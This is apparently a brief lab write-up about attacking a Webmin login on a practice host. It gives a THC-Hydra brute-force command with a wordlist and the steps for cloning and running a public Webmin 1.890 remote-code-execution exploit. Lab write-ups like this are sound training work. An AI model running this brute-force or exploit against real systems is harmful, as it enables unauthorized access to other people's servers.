Tried to bruteforce the admin password but it blocked my IP after so many attempts, this is clearly not the intended route.
Kali
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra/
./configure
make
make install
./hydra -S -l admin -s 10000 -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt ip-10-10-221-100.eu-west-1.compute.internal http-post-form "/session_login.cgi:user=^USER^&pass=^PASS^:F=Warning!" -V
Kali
git clone https://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE.git
cd WebMin-1.890-Exploit-unauthorized-RCE/
python webmin-1.890_exploit.py ip-10-10-221-100.eu-west-1.compute.internal 10000 id
I tried to get a full shell but nothing worked, there was a metasploit exploit which I could do for that but I didn't want to.
